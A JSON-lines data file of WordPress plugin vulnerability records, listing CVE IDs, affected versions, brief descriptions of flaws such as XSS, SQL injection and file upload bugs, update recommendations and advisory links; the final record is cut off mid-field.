{"CVE_ID":"CVE-2024-2082","slug":"all-contact-form-integration-for-elementor","versionImpact":"2.9.9.7","versionEndExcluding":"2.9.9.8","description":"The EleForms \u2013 All In One Form Integration including DB for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 2.9.9.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cefcd612-0ba8-4225-8f23-817b7220ee7b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cefcd612-0ba8-4225-8f23-817b7220ee7b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3056456%40all-contact-form-integration-for-elementor%2Ftrunk&old=3021680%40all-contact-form-integration-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3056456%40all-contact-form-integration-for-elementor%2Ftrunk&old=3021680%40all-contact-form-integration-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2043","slug":"all-contact-form-integration-for-elementor","versionImpact":"2.9.9.7","versionEndExcluding":"2.9.9.8","description":"The EleForms \u2013 All In One Form Integration including DB for Elementor plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check when downloading form submissions in all versions up to, and including, 2.9.9.7. This makes it possible for unauthenticated attackers to view form submissions.","recommendation":"Update to version 2.9.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a40ed3c-1f4b-4bf7-b6f4-fc1e145cc989?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a40ed3c-1f4b-4bf7-b6f4-fc1e145cc989?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-contact-form-integration-for-elementor\\\/trunk\\\/includes\\\/export_csv.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/all-contact-form-integration-for-elementor\\\/trunk\\\/includes\\\/export_csv.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3056456%40all-contact-form-integration-for-elementor%2Ftrunk&old=3021680%40all-contact-form-integration-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3056456%40all-contact-form-integration-for-elementor%2Ftrunk&old=3021680%40all-contact-form-integration-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7112","slug":"booking-system","versionImpact":"2.9.9.5.0","versionEndExcluding":"2.9.9.5.1","description":"The Pinpoint Booking System \u2013 #1 WordPress Booking Plugin plugin for WordPress is vulnerable to SQL Injection via the \u2018schedule\u2019 parameter in all versions up to, and including, 2.9.9.5.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.9.9.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a7358cd-fec8-4a16-ae6b-14194bb63396?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a7358cd-fec8-4a16-ae6b-14194bb63396?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-system\\\/trunk\\\/includes\\\/calendars\\\/class-backend-calendar-schedule.php#L529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-system\\\/trunk\\\/includes\\\/calendars\\\/class-backend-calendar-schedule.php#L529\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-system\\\/trunk\\\/includes\\\/calendars\\\/class-backend-calendar-schedule.php#L441\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-system\\\/trunk\\\/includes\\\/calendars\\\/class-backend-calendar-schedule.php#L441\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147739\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147739\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3636","slug":"UNKNOWN-CVE-2023-25062-1","versionImpact":"2.9.9.4.7","versionEndExcluding":"2.9.9.4.8","description":"The Pinpoint Booking System WordPress plugin before 2.9.9.4.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.9.9.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bab46c28-71aa-4610-9683-361e7b008d37\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bab46c28-71aa-4610-9683-361e7b008d37\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0220","slug":"booking-system","versionEndExcluding":"2.9.9.2.9","description":"The Pinpoint Booking System WordPress plugin before 2.9.9.2.9 does not validate and escape one of its shortcode attributes before using it in a SQL statement, which could allow any authenticated user, such as a subscriber, to perform SQL Injection attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6d976be-31d1-419d-8729-4a36fbd2755c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6d976be-31d1-419d-8729-4a36fbd2755c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6230","slug":"pardakht-delkhah","versionImpact":"2.9.8","versionEndExcluding":"2.9.9","description":"The ?????? ?????? ?????? WordPress plugin through 2.9.8 does not have a CSRF check in place when resetting its form fields, which could allow attackers to make a logged in admin perform such an action via a CSRF attack.","recommendation":"Update to version 2.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/311e3c15-0f58-4f3b-91f8-0c62c0eea55e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/311e3c15-0f58-4f3b-91f8-0c62c0eea55e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4830","slug":"paid-memberships-pro","versionEndExcluding":"2.9.9","description":"The Paid Memberships Pro WordPress plugin before 2.9.9 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae103336-a411-4ebf-a5f0-2f35701e364c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae103336-a411-4ebf-a5f0-2f35701e364c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11496","slug":"infility-global","versionImpact":"2.9.8","versionEndExcluding":"2.9.9","description":"The Infility Global plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the infility_global_ajax function in all versions up to, and including, 2.9.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update plugin options and potentially break the site.","recommendation":"Update to version 2.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infility-global\\\/trunk\\\/include\\\/class\\\/action.class.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infility-global\\\/trunk\\\/include\\\/class\\\/action.class.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infility-global\\\/trunk\\\/infility_global.php#L121\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infility-global\\\/trunk\\\/infility_global.php#L121\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0fd1c19-b752-4562-9365-165d709b91b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0fd1c19-b752-4562-9365-165d709b91b2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9538","slug":"woolentor-addons","versionImpact":"2.9.8","versionEndExcluding":"2.9.9","description":"The ShopLentor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.9.8 via the 'render' function in includes\/addons\/wl_faq.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data.","recommendation":"Update to version 2.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b36938e-5333-4331-9bb1-34465fe03f2f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b36938e-5333-4331-9bb1-34465fe03f2f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164057\\\/woolentor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164057\\\/woolentor-addons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36703","slug":"elementor","versionEndExcluding":"2.9.8","description":"The Elementor Website Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG image uploads in versions up to, and including, 2.9.7. This makes it possible for authenticated attackers with the upload_files capability to inject arbitrary web scripts in pages that will execute whenever a user accesses the page with the stored web scripts.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-elementor-plugin-fixed-svg-xss-protection-bypass-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-elementor-plugin-fixed-svg-xss-protection-bypass-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42db52ae-f881-4082-b475-8577a28641c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42db52ae-f881-4082-b475-8577a28641c6?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8668","slug":"woolentor-addons","versionImpact":"2.9.7","versionEndExcluding":"2.9.8","description":"The ShopLentor \u2013 WooCommerce Builder for Elementor & Gutenberg +12 Modules \u2013 All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the tooltip and countdown functionality in all versions up to, and including, 2.9.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afe2b2e5-601f-4b6b-940a-b82f723b8776?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afe2b2e5-601f-4b6b-940a-b82f723b8776?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.9.7\\\/assets\\\/js\\\/woolentor-widgets-active.js#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.9.7\\\/assets\\\/js\\\/woolentor-widgets-active.js#L111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3155859%40woolentor-addons&new=3155859%40woolentor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3155859%40woolentor-addons&new=3155859%40woolentor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.9.7\\\/assets\\\/js\\\/woolentor-widgets-active.js#L151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.9.7\\\/assets\\\/js\\\/woolentor-widgets-active.js#L151\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6120","slug":"usc-e-shop","versionImpact":"2.9.6","versionEndExcluding":"2.9.7","description":"The Welcart e-Commerce plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 2.9.6 via the upload_certificate_file function. This makes it possible for administrators to upload .pem or .crt files to arbitrary locations on the server.","recommendation":"Update to version 2.9.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2677cea6-d60d-4e10-afd7-e088a5592b19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2677cea6-d60d-4e10-afd7-e088a5592b19?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2992785\\\/usc-e-shop\\\/trunk\\\/classes\\\/paymentPaygent.class.php?contextall=1&old=2880236&old_path=%2Fusc-e-shop%2Ftrunk%2Fclasses%2FpaymentPaygent.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2992785\\\/usc-e-shop\\\/trunk\\\/classes\\\/paymentPaygent.class.php?contextall=1&old=2880236&old_path=%2Fusc-e-shop%2Ftrunk%2Fclasses%2FpaymentPaygent.class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2999846%40usc-e-shop%2Ftrunk&old=2996147%40usc-e-shop%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2999846%40usc-e-shop%2Ftrunk&old=2996147%40usc-e-shop%2Ftrunk&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13528","slug":"emails-verification-for-woocommerce","versionImpact":"2.9.5","versionEndExcluding":"2.9.6","description":"The Customer Email Verification for WooCommerce plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 2.9.5. This is due to the presence of a shortcode that will generate a confirmation link with a placeholder email. This makes it possible for authenticated attackers, with Contributor-level access and above, to generate a verification link for any unverified user and log into the account. The 'Fine tune placement' option must be enabled in the plugin settings in order to exploit the vulnerability.","recommendation":"Update to version 2.9.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/emails-verification-for-woocommerce\\\/tags\\\/2.9.2\\\/includes\\\/class-alg-wc-ev-emails.php#L151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/emails-verification-for-woocommerce\\\/tags\\\/2.9.2\\\/includes\\\/class-alg-wc-ev-emails.php#L151\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3238136\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3238136\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b3798e3-45fe-4829-9012-dc728d4af87f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0b3798e3-45fe-4829-9012-dc728d4af87f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10571","slug":"chart-builder","versionImpact":"2.9.5","versionEndExcluding":"2.9.6","description":"The Chartify \u2013 WordPress Chart Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.9.5 via the 'source' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.9.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4837258-c749-4194-926c-22b67e20c1fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4837258-c749-4194-926c-22b67e20c1fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chart-builder\\\/tags\\\/2.9.6\\\/admin\\\/partials\\\/charts\\\/actions\\\/chart-builder-charts-actions-options.php?rev=3184238\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chart-builder\\\/tags\\\/2.9.6\\\/admin\\\/partials\\\/charts\\\/actions\\\/chart-builder-charts-actions-options.php?rev=3184238\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5953","slug":"usc-e-shop","versionImpact":"2.9.4","versionEndExcluding":"2.9.5","description":"The Welcart e-Commerce WordPress plugin before 2.9.5 does not validate files to be uploaded, and does not have authorisation and CSRF checks in the AJAX action handling such uploads. As a result, any authenticated user, such as a subscriber, could upload arbitrary files, such as PHP, on the server.","recommendation":"Update to version 2.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d29ba12-f14a-4cee-baae-a6049d83bce6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d29ba12-f14a-4cee-baae-a6049d83bce6\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5952","slug":"usc-e-shop","versionImpact":"2.9.4","versionEndExcluding":"2.9.5","description":"The Welcart e-Commerce WordPress plugin before 2.9.5 unserializes user input from cookies, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget is present on the blog.","recommendation":"Update to version 2.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0acd613e-dbd6-42ae-9f3d-6d6e77a4c1b7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0acd613e-dbd6-42ae-9f3d-6d6e77a4c1b7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5951","slug":"usc-e-shop","versionImpact":"2.9.4","versionEndExcluding":"2.9.5","description":"The Welcart e-Commerce WordPress plugin before 2.9.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 2.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81dc093a-545d-4bcd-ab85-ee9472d709e5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81dc093a-545d-4bcd-ab85-ee9472d709e5\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13525","slug":"emails-verification-for-woocommerce","versionImpact":"2.9.4","versionEndExcluding":"2.9.5","description":"The Customer Email Verification for WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.9.4 via Shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including emails as well as hashed passwords of any user.","recommendation":"Update to version 2.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/emails-verification-for-woocommerce\\\/tags\\\/2.9.2\\\/includes\\\/class-alg-wc-ev-core.php#L990\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/emails-verification-for-woocommerce\\\/tags\\\/2.9.2\\\/includes\\\/class-alg-wc-ev-core.php#L990\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3232261%40emails-verification-for-woocommerce%2Ftrunk&old=3230854%40emails-verification-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3232261%40emails-verification-for-woocommerce%2Ftrunk&old=3230854%40emails-verification-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a63a41d1-b9b0-43a9-a6e0-761f3b8d9d4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a63a41d1-b9b0-43a9-a6e0-761f3b8d9d4a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36761","slug":"top-10","versionEndExcluding":"2.9.5","description":"The Top 10 plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.10.4. This is due to missing or incorrect nonce validation on the tptn_export_tables() function. This makes it possible for unauthenticated attackers to generate an export of the top 10 table via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368373%40top-10&new=2368373%40top-10&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368373%40top-10&new=2368373%40top-10&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0af86e4-c30b-49e2-ad6a-97a415a74d18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0af86e4-c30b-49e2-ad6a-97a415a74d18?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7170","slug":"eventon-rsvp","versionImpact":"2.9.4","versionEndExcluding":"2.9.5","description":"The EventON-RSVP WordPress plugin before 2.9.5 does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 2.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/218fb3af-3a40-486f-8ea9-80211a986fb3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/218fb3af-3a40-486f-8ea9-80211a986fb3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7847","slug":"ai-engine","versionImpact":"2.9.4","versionEndExcluding":"2.9.5","description":"The AI Engine plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the rest_simpleFileUpload() function in versions 2.9.3 and 2.9.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server when the REST API is enabled, which may make remote code execution possible.","recommendation":"Update to version 2.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.9.3\\\/classes\\\/api.php#L673\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.9.3\\\/classes\\\/api.php#L673\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.9.3\\\/classes\\\/modules\\\/files.php#L332\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.9.3\\\/classes\\\/modules\\\/files.php#L332\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329842\\\/ai-engine\\\/trunk\\\/classes\\\/api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3329842\\\/ai-engine\\\/trunk\\\/classes\\\/api.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3332539%40ai-engine&new=3332539%40ai-engine&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3332539%40ai-engine&new=3332539%40ai-engine&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c1c7ec9-d01f-433d-abec-dc2b6ff684c7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c1c7ec9-d01f-433d-abec-dc2b6ff684c7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6944","slug":"uncode-core","versionImpact":"2.9.4.2","versionEndExcluding":"2.9.4.3","description":"The Uncode Core plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'uncode_hl_text' and 'uncode_text_icon' shortcodes in all versions up to, and including, 2.9.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.9.4.3, or a newer patched 